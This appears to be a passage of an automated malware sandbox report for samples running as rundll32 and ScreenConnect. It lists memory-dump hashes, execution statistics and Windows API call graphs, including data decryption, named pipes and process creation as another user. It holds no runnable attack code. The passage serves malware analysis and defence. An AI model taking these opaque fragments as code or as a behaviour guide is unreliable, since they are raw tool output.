                                                                  • Opcode Fuzzy Hash: 272aa04f2aa5a027eb3965fa0e0b66c52b44cd9ca6e85a2ed04079b354c10a85
                                                                  • Instruction Fuzzy Hash: C601F7715043449AE7109F25E984B66BFD8DF41B65F08CA1AED088E142D6B8A841C6F1
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2225730158.000000000483D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0483D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_483d000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 058056d1d59ad2d0fd6464fa0aa64e0c518c7475e28020a1123d340f9bf26d32
                                                                  • Instruction ID: 68311c3525790563de15869e4a957fb00d426d68557b062743b080350725f2e2
                                                                  • Opcode Fuzzy Hash: 058056d1d59ad2d0fd6464fa0aa64e0c518c7475e28020a1123d340f9bf26d32
                                                                  • Instruction Fuzzy Hash: BC019E6200E3C09FE7128B25D894B52BFB4DF43624F08C1CBD9888F1A3C2685849C7B2
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000003.2224648894.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_3_7020000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f623c68bee4232f53f95f6d137018e108bb923e494f917b1669796c60b732c52
                                                                  • Instruction ID: 283c0590a7cb3c2dd457ff821c4178aee6457e04ec403ea77ad4ab99c5b64dee
                                                                  • Opcode Fuzzy Hash: f623c68bee4232f53f95f6d137018e108bb923e494f917b1669796c60b732c52
                                                                  • Instruction Fuzzy Hash: 37F046723043414BC31AA7A9D9A059A7FF6DFC76243066A6BE208CB350DE60AD0687E0
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000003.2224648894.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_3_7020000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 73d563136c98092d103f50eaeedc4ed912659c47e57a95aabdeb448700ff3a23
                                                                  • Instruction ID: 8fa844bc2f4e06cfb1641787d2b783df18b93673473e9fd9ff04f80ba182a103
                                                                  • Opcode Fuzzy Hash: 73d563136c98092d103f50eaeedc4ed912659c47e57a95aabdeb448700ff3a23
                                                                  • Instruction Fuzzy Hash: ECF0C2B16013469FC70D9F74553122A3FA5EEC221070809EFC109CF251FB654800E7E0
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000003.2224648894.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_3_7020000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bc2603ba855945322796df23f19c03ec1d8b2c934efb069585dd2f12cc6064d1
                                                                  • Instruction ID: 80a6b070349658334deb38246502e60c522c1eecb819443c831b229b073dc94d
                                                                  • Opcode Fuzzy Hash: bc2603ba855945322796df23f19c03ec1d8b2c934efb069585dd2f12cc6064d1
                                                                  • Instruction Fuzzy Hash: 82F0A0632156761AEF2911F419003E62AD85B4562CF02067BD482C6A82D984D88333E3
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000003.2224648894.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_3_7020000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cef6d33c211cff143fd23be3ef8b536d4c6b8e47bcf4eaa9d78742f78f35389a
                                                                  • Instruction ID: 7fd7f27bdd8024e122eadd0c14f2163b76e676928143c75dd431574c3bdc63e0
                                                                  • Opcode Fuzzy Hash: cef6d33c211cff143fd23be3ef8b536d4c6b8e47bcf4eaa9d78742f78f35389a
                                                                  • Instruction Fuzzy Hash: E5F02E71300210578228A6AED85155B7FEADFC5734301663AF309C7340DEA0ED0147E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000003.2224648894.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_3_7020000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6047162fb601982cb081ede124ab0b469223432a779f9cbac0a3488b26eca256
                                                                  • Instruction ID: 08984f8a98d2285b001a217e7350b33ca58c2f0945c9ff83f75739e30f4971c3
                                                                  • Opcode Fuzzy Hash: 6047162fb601982cb081ede124ab0b469223432a779f9cbac0a3488b26eca256
                                                                  • Instruction Fuzzy Hash: C2F05C317093845FD3055B69D810756BF6ADFCA214F5540BAE54CC7256CE355C06C790
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000003.2224648894.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_3_7020000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9345af06fe46da0fe73a2cfcab236db2e93694b567154389e27f2a30a5c1182e
                                                                  • Instruction ID: a83c0a3460da3416f6041e917d2bb8c0ff640b9fb128696bc959a2d2f9f23b69
                                                                  • Opcode Fuzzy Hash: 9345af06fe46da0fe73a2cfcab236db2e93694b567154389e27f2a30a5c1182e
                                                                  • Instruction Fuzzy Hash: 5AE092B160928A9FCB05DBB8F9111F9BFF4EB4120171186EAD848D7652DA742F409792
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000003.2224648894.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_3_7020000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ad74c4f0cec0162d769f0ae37d0d3454d3dda6c15566e487264552510bd97614
                                                                  • Instruction ID: cec96e24ff978390b10e7760bd7444139df7babce2684ce2c2bcce0b31cbcd6a
                                                                  • Opcode Fuzzy Hash: ad74c4f0cec0162d769f0ae37d0d3454d3dda6c15566e487264552510bd97614
                                                                  • Instruction Fuzzy Hash: 07E026327002044BD304AA6EE840A17B79EDFC8225B104479E50CC3305CD76AC028AD0
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000003.2224648894.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_3_7020000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: df8dda03b5e13fb4b5ef335676be25a74dff1e63e030107638ea32e2efb8f237
                                                                  • Instruction ID: ac91e7b0b48445395d9a3b40c4c4566a1bd7bf9c688695e9954b27b95235c5ca
                                                                  • Opcode Fuzzy Hash: df8dda03b5e13fb4b5ef335676be25a74dff1e63e030107638ea32e2efb8f237
                                                                  • Instruction Fuzzy Hash: E0D02E67A1A3708BCB4222F432202E22B589B01032F024AF3DA08DFA03E0280C4223D0
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000003.2224648894.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_3_7020000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5fe0de9bf735b908cae5d3ac8683114e282f769e26459b98bbe37c24bebb355e
                                                                  • Instruction ID: 746009c5a501abfd509cabd4d2dd3b10084a531e365231b241e6f294d0383761
                                                                  • Opcode Fuzzy Hash: 5fe0de9bf735b908cae5d3ac8683114e282f769e26459b98bbe37c24bebb355e
                                                                  • Instruction Fuzzy Hash: 24E0C2366193A18FC301D368A9249A93BA58F0A220B0401EBE109CBB73C5595C444395
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000003.2224648894.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_3_7020000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7975b5fa10892d76de91d048c0e2bbd9b1daad36e5ce44cd8a029794bb5a0f40
                                                                  • Instruction ID: a641a34cd809a6e9d79bab3c7cb3d1131f7b12cb7c22a173a76ca0b60d6bf4de
                                                                  • Opcode Fuzzy Hash: 7975b5fa10892d76de91d048c0e2bbd9b1daad36e5ce44cd8a029794bb5a0f40
                                                                  • Instruction Fuzzy Hash: B6E02E332183A0CFC302AB64E9110E57FF1AB1A22031840ABF884CB372CE350C1ADB90
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000003.2224648894.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_3_7020000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9f82e8952c926fd0dda37023cb7974361c21505d8ec25f5ccef8bc55f0107188
                                                                  • Instruction ID: 9c799d0e6282c91a47182057ff50ec230ec3f3b817a84a8af9cff3e5bf7188c5
                                                                  • Opcode Fuzzy Hash: 9f82e8952c926fd0dda37023cb7974361c21505d8ec25f5ccef8bc55f0107188
                                                                  • Instruction Fuzzy Hash: 83E08670900109EFCB04DFA4D54199DBFF4EB8530171116D9D804D3200EB702F409B80
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000003.2224648894.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_3_7020000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e2f7aeb51cf894cd2980d62e561314d8e6cb6946b61e8b91920d37439b8c1202
                                                                  • Instruction ID: 8cef50483f7f9b622c1c716adf4e3a20688077ae40a28a1a59e272204c86013b
                                                                  • Opcode Fuzzy Hash: e2f7aeb51cf894cd2980d62e561314d8e6cb6946b61e8b91920d37439b8c1202
                                                                  • Instruction Fuzzy Hash: 3CD0A9323611309BE604AA2CE4548AA3B99DB8E725F0008AAF60ADB360CD92FC0003C8
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000003.2224648894.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_3_7020000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 255f6788c6a8bd238170c159ae681cfe875791819d00ab75aebe7d9cbe12dc44
                                                                  • Instruction ID: 1fd1079815b513323f5a0bcccc53626a61bb9e7d2ccd28b57be5a48c86470314
                                                                  • Opcode Fuzzy Hash: 255f6788c6a8bd238170c159ae681cfe875791819d00ab75aebe7d9cbe12dc44
                                                                  • Instruction Fuzzy Hash: 9AD0A77322012CAB52146B58D88597A7B99E7993A07104427FA0583220DD706C0597DA
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000003.2224648894.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_3_7020000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7b899c2f6ec94b686b50f4b0cae2a90ca063502d41288ba51b175c81846653c6
                                                                  • Instruction ID: d60e2303c811c85c75e988568e80d9332fcd6998e1f233cb353e3725d1b20cfd
                                                                  • Opcode Fuzzy Hash: 7b899c2f6ec94b686b50f4b0cae2a90ca063502d41288ba51b175c81846653c6
                                                                  • Instruction Fuzzy Hash: D2D05BB090110DEFCB04EFE8D94155DBBF5EB44205B1046ADD808D7200DEB16F0097C1
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000003.2224648894.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_3_7020000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5ad6e0988ac0c007f735237394ff57a622bec2c05f9508383445f81bedea5701
                                                                  • Instruction ID: 046d6e5d114ca729589c536700b349a75a799b39f208245c85b7b0015b97a178
                                                                  • Opcode Fuzzy Hash: 5ad6e0988ac0c007f735237394ff57a622bec2c05f9508383445f81bedea5701
                                                                  • Instruction Fuzzy Hash: 65D01270901109EFCB08DFA8D941A9D7BF5EB85205B1156E99408D7200DE712F409B81
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000003.2224648894.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_3_7020000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f97504ce382abe569640823a7086643630c56b355176dc45517d9a82d213351f
                                                                  • Instruction ID: c12ab3d1b51730643fe5ce176a4d1ab571c8de662d5ad7ee7513d58d7a467738
                                                                  • Opcode Fuzzy Hash: f97504ce382abe569640823a7086643630c56b355176dc45517d9a82d213351f
                                                                  • Instruction Fuzzy Hash: 61D012B350E7D29FD75746A404504D9BF71EB331153C942DFC080C9422F25E065BD761

                                                                  Execution Graph

                                                                  Execution Coverage:13.2%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:3.8%
                                                                  Total number of Nodes:158
                                                                  Total number of Limit Nodes:10
                                                                  execution_graph 40265 5ef1068 40266 5ef108b 40265->40266 40269 5ef13f1 40266->40269 40273 5ef1460 40269->40273 40276 5ef1454 40269->40276 40274 5ef14b4 ConnectNamedPipe 40273->40274 40275 5ef14f0 40274->40275 40275->40275 40277 5ef14b4 ConnectNamedPipe 40276->40277 40278 5ef14f0 40277->40278 40279 5ef0967 40280 5ef0972 40279->40280 40284 5ef5fd1 40280->40284 40293 5ef6030 40280->40293 40281 5ef0a4e 40281->40281 40285 5ef5fda 40284->40285 40287 5ef6034 40284->40287 40285->40281 40286 5ef60a0 40291 5ef618f 3 API calls 40286->40291 40292 5ef61a0 3 API calls 40286->40292 40288 5ef6077 40287->40288 40301 5ef618f 40287->40301 40309 5ef61a0 40287->40309 40288->40281 40291->40288 40292->40288 40294 5ef603a 40293->40294 40296 5ef6077 40294->40296 40297 5ef618f 3 API calls 40294->40297 40298 5ef61a0 3 API calls 40294->40298 40295 5ef60a0 40299 5ef618f 3 API calls 40295->40299 40300 5ef61a0 3 API calls 40295->40300 40296->40281 40297->40295 40298->40295 40299->40296 40300->40296 40302 5ef61a0 40301->40302 40304 5ef61e4 40302->40304 40317 5ef58bc 40302->40317 40321 5ee3388 40304->40321 40325 5ee3341 40304->40325 40330 5ee33cd 40304->40330 40305 5ef61ef 40305->40286 40311 5ef61ad 40309->40311 40310 5ef58bc WaitNamedPipeW 40310->40311 40311->40310 40312 5ef61e4 40311->40312 40314 5ee33cd 2 API calls 40312->40314 40315 5ee3388 CreateFileA 40312->40315 40316 5ee3341 CreateFileA 40312->40316 40313 5ef61ef 40313->40286 40314->40313 40315->40313 40316->40313 40318 5ef6208 WaitNamedPipeW 40317->40318 40320 5ef6284 40318->40320 40320->40302 40322 5ee339b 40321->40322 40337 5ee2a74 40322->40337 40326 5ee32f4 40325->40326 40327 5ee334e 40325->40327 40326->40305 40328 5ee2a74 CreateFileA 40327->40328 40329 5ee33c0 40328->40329 40329->40305 40331 5ee336a 40330->40331 40334 5ee33d6 40330->40334 40333 5ee2a74 CreateFileA 40331->40333 40332 5ee34ab CreateFileA 40336 5ee350d 40332->40336 40335 5ee33c0 40333->40335 40334->40332 40334->40334 40335->40305 40336->40305 40339 5ee33d8 CreateFileA 40337->40339 40340 5ee33c0 40339->40340 40340->40305 40341 4641678 40342 46416c0 CryptProtectData 40341->40342 40343 46416ba 40341->40343 40344 4641703 40342->40344 40343->40342 40345 5ee35f0 40346 5ee3601 40345->40346 40347 5ee362a 40346->40347 40348 5ee33cd 2 API calls 40346->40348 40350 5ee2a74 CreateFileA 40346->40350 40352 5ee2a80 40346->40352 40356 5ee2a27 40346->40356 40348->40347 40350->40347 40353 5ee2a1e 40352->40353 40354 5ee34ab CreateFileA 40353->40354 40355 5ee29c4 40353->40355 40354->40355 40355->40347 40358 5ee2a2e 40356->40358 40357 5ee29c4 40358->40357 40359 5ee34ab CreateFileA 40358->40359 40360 5ee350d 40359->40360 40360->40347 40361 5ee0800 40362 5ee082b 40361->40362 40366 5ee09ff 40362->40366 40370 5ee0a30 40362->40370 40363 5ee08b9 40367 5ee0a12 40366->40367 40374 5ee0aa0 CryptUnprotectData 40367->40374 40371 5ee0a4d 40370->40371 40373 5ee0aa0 CryptUnprotectData 40371->40373 40372 5ee0a84 40372->40363 40373->40372 40375 5ee0a84 40374->40375 40375->40363 40376 5ef0040 40377 5ef0071 40376->40377 40386 5ef0bc1 40377->40386 40378 5ef00c7 40379 5ef0207 40378->40379 40392 5ef1970 40378->40392 40396 5ef1980 40378->40396 40384 5ef5fd1 3 API calls 40379->40384 40385 5ef6030 3 API calls 40379->40385 40380 5ef0a4e 40380->40380 40384->40380 40385->40380 40387 5ef0bf4 40386->40387 40389 5ef0c3c 40387->40389 40400 5ee6028 40387->40400 40408 5ee6018 40387->40408 40388 5ef0ccc 40389->40378 40393 5ef1980 40392->40393 40451 5ef19e0 40393->40451 40397 5ef198f 40396->40397 40399 5ef19e0 2 API calls 40397->40399 40398 5ef19a4 40398->40379 40399->40398 40402 5ee605c 40400->40402 40403 5ee604c 40400->40403 40401 5ee6055 40401->40388 40416 5ee61a8 40402->40416 40423 5ee6198 40402->40423 40403->40401 40404 5ee61a8 4 API calls 40403->40404 40405 5ee6198 4 API calls 40403->40405 40404->40403 40405->40403 40409 5ee604c 40408->40409 40411 5ee605c 40408->40411 40410 5ee6055 40409->40410 40412 5ee61a8 4 API calls 40409->40412 40413 5ee6198 4 API calls 40409->40413 40410->40388 40414 5ee61a8 4 API calls 40411->40414 40415 5ee6198 4 API calls 40411->40415 40412->40409 40413->40409 40414->40409 40415->40409 40417 5ee61dd 40416->40417 40420 5ee61cd 40416->40420 40430 5ee6328 40417->40430 40437 5ee6319 40417->40437 40418 5ee61d6 40418->40403 40420->40418 40444 5ee4bf8 40420->40444 40425 5ee61cd 40423->40425 40427 5ee61dd 40423->40427 40424 5ee61d6 40424->40403 40425->40424 40426 5ee4bf8 ProcessIdToSessionId 40425->40426 40426->40425 40428 5ee6328 2 API calls 40427->40428 40429 5ee6319 2 API calls 40427->40429 40428->40425 40429->40425 40435 5ee6352 40430->40435 40436 5ee633f 40430->40436 40431 5ee6348 40431->40420 40432 5ee64ba K32EnumProcesses 40433 5ee64f2 40432->40433 40433->40420 40435->40436 40447 5ee4c04 40435->40447 40436->40431 40436->40432 40442 5ee6352 40437->40442 40443 5ee633f 40437->40443 40438 5ee6348 40438->40420 40439 5ee64ba K32EnumProcesses 40440 5ee64f2 40439->40440 40440->40420 40441 5ee4c04 K32EnumProcesses 40441->40442 40442->40441 40442->40443 40443->40438 40443->40439 40445 5ee6560 ProcessIdToSessionId 40444->40445 40446 5ee65d3 40445->40446 40446->40420 40448 5ee6468 K32EnumProcesses 40447->40448 40450 5ee64f2 40448->40450 40450->40435 40452 5ef1a1b 40451->40452 40456 5ef28ab 40452->40456 40460 5ef28b0 40452->40460 40453 5ef1ae9 40457 5ef28b0 CreateProcessAsUserW 40456->40457 40459 5ef2994 40457->40459 40459->40453 40461 5ef2903 CreateProcessAsUserW 40460->40461 40463 5ef2994 40461->40463 40463->40453

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 311 5ef28b0-5ef2901 312 5ef290c-5ef2910 311->312 313 5ef2903-5ef2909 311->313 314 5ef2918-5ef292d 312->314 315 5ef2912-5ef2915 312->315 313->312 316 5ef292f-5ef2938 314->316 317 5ef293b-5ef2992 CreateProcessAsUserW 314->317 315->314 316->317 318 5ef299b-5ef29c3 317->318 319 5ef2994-5ef299a 317->319 319->318
                                                                  APIs
                                                                  • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 05EF297F
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3463567543.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5ef0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcessUser
                                                                  • String ID:
                                                                  • API String ID: 2217836671-0
                                                                  • Opcode ID: 46fc4b20373faf5f26e054f4160b3262b5464e8608052233d93df29e917ee0af
                                                                  • Instruction ID: d58475ec53e65a9935acbdf587341818e43f37cdd2cc0e96bfb4401b71ca36ec
                                                                  • Opcode Fuzzy Hash: 46fc4b20373faf5f26e054f4160b3262b5464e8608052233d93df29e917ee0af
                                                                  • Instruction Fuzzy Hash: 4041247690020ADFDF10CFA9C880ADEBBF5FF48310F14842AEA58A7250D775A955CF90

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 355 4641671-46416b8 356 46416c0-4641701 CryptProtectData 355->356 357 46416ba-46416bd 355->357 358 4641703-4641709 356->358 359 464170a-4641732 356->359 357->356 358->359
                                                                  APIs
                                                                  • CryptProtectData.CRYPT32(?,00000000,?,?,?,?,?), ref: 046416EE
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3457622995.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_4640000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: CryptDataProtect
                                                                  • String ID:
                                                                  • API String ID: 3091777813-0
                                                                  • Opcode ID: fcc1fb1bf8f79a0ace3cb340a48eab51956908c8a8a222ca54361144777e7a72
                                                                  • Instruction ID: 7117902742d801010b856d9cd47fb53b40f9e108a4f728fe4badca304f3b4e02
                                                                  • Opcode Fuzzy Hash: fcc1fb1bf8f79a0ace3cb340a48eab51956908c8a8a222ca54361144777e7a72
                                                                  • Instruction Fuzzy Hash: 492116B680024A9FDF10CF9AC844ADEBFF1FF89310F14852AE918A7211D779A555CFA1

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 362 4641678-46416b8 363 46416c0-4641701 CryptProtectData 362->363 364 46416ba-46416bd 362->364 365 4641703-4641709 363->365 366 464170a-4641732 363->366 364->363 365->366
                                                                  APIs
                                                                  • CryptProtectData.CRYPT32(?,00000000,?,?,?,?,?), ref: 046416EE
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3457622995.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_4640000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: CryptDataProtect
                                                                  • String ID:
                                                                  • API String ID: 3091777813-0
                                                                  • Opcode ID: bbc9e659a3c6c843c1e36dbafd38c899a74af69502c7dd7941ac835f95012686
                                                                  • Instruction ID: 5eb0ebf8df4013d578cada75290b009fbac9c4e7a8eff683032feb771412ea35
                                                                  • Opcode Fuzzy Hash: bbc9e659a3c6c843c1e36dbafd38c899a74af69502c7dd7941ac835f95012686
                                                                  • Instruction Fuzzy Hash: FB2104B680024ADFDF10CF9AC844ADEBBF5FF88320F14841AE918A7211D779A555CFA1
                                                                  APIs
                                                                  • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 05EE0B05
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3463435055.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5ee0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID: CryptDataUnprotect
                                                                  • String ID:
                                                                  • API String ID: 834300711-0
                                                                  • Opcode ID: 94c932de3e9f773296d923ea22c0dc632d921822550cfd22aa2dd838b4f9b560
                                                                  • Instruction ID: 753483264e5220ba3cd7b8c00eed83f8fecc4bfb5c2ac6272cc11cb708f17192
                                                                  • Opcode Fuzzy Hash: 94c932de3e9f773296d923ea22c0dc632d921822550cfd22aa2dd838b4f9b560
                                                                  • Instruction Fuzzy Hash: 9F2133B280024ADFDF10CF99C845BDEBBF5FB48324F10841AEA14A7210C379A550CFA1

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 144 5ee2a80-5ee2a88 146 5ee2a1e-5ee2a2b 144->146 147 5ee2a8a-5ee2a98 144->147 150 5ee2a2e-5ee2a30 146->150 147->150 151 5ee2a9a-5ee2ab0 147->151 152 5ee29c4-5ee2a20 150->152 153 5ee2a32-5ee3434 150->153 157 5ee9560-5ee9567 151->157 163 5ee3488-5ee350b CreateFileA 153->163 164 5ee3436-5ee345b 153->164 171 5ee350d-5ee3513 163->171 172 5ee3514-5ee3552 163->172 164->163 167 5ee345d-5ee345f 164->167 169 5ee3482-5ee3485 167->169 170 5ee3461-5ee346b 167->170 169->163 173 5ee346f-5ee347e 170->173 174 5ee346d 170->174 171->172 179 5ee3554-5ee3558 172->179 180 5ee3562 172->180 173->173 175 5ee3480 173->175 174->173 175->169 179->180 181 5ee355a 179->181 180->157 181->180
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3463435055.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5ee0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 03b4f102c7078becbd448d441dfdf68ea9143b7b1daaab79b90359d755f2119b
                                                                  • Instruction ID: caa4b72b95fa3acfdc0a12041f11e898511c6bfa65b8e3675264655d00dde498
                                                                  • Opcode Fuzzy Hash: 03b4f102c7078becbd448d441dfdf68ea9143b7b1daaab79b90359d755f2119b
                                                                  • Instruction Fuzzy Hash: 7861CB719183A9CFDB01CFA8C8907DDBFF1AF48304F18806AD488EB292D7789845CB91

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 182 5ee6328-5ee633d 183 5ee633f-5ee6342 182->183 184 5ee6352-5ee6359 182->184 185 5ee640c-5ee6420 183->185 186 5ee6348-5ee6351 183->186 187 5ee635e-5ee63a2 call 5ee4c04 184->187 188 5ee63e6-5ee63ef 185->188 189 5ee6422 185->189 205 5ee63a7-5ee63ac 187->205 191 5ee644c-5ee64ae 188->191 192 5ee63f1-5ee640b 188->192 193 5ee642e-5ee6437 189->193 196 5ee64ba-5ee64f0 K32EnumProcesses 191->196 197 5ee64b0-5ee64b8 191->197 198 5ee64f9-5ee6521 196->198 199 5ee64f2-5ee64f8 196->199 197->196 199->198 206 5ee6438-5ee6445 205->206 207 5ee63b2-5ee63b5 205->207 206->191 208 5ee63b7-5ee63e4 207->208 209 5ee6424-5ee6429 207->209 208->188 208->193 209->187
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3463435055.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5ee0000_ScreenConnect.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1799380a09ad6bd38b73c5f323aeb36f20d633a02a4c588abe04e5dfd4de2fe3
                                                                  • Instruction ID: f319523786888017a48eab8371e4a3908a8917c12f1fba405a6e2a47c7a1681c
                                                                  • Opcode Fuzzy Hash: 1799380a09ad6bd38b73c5f323aeb36f20d633a02a4c588abe04e5dfd4de2fe3
                                                                  • Instruction Fuzzy Hash: 58518071A107058FDB24CFA9D8806AEBBF1FF98310F24892ED55AD7740D734A945CBA1

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
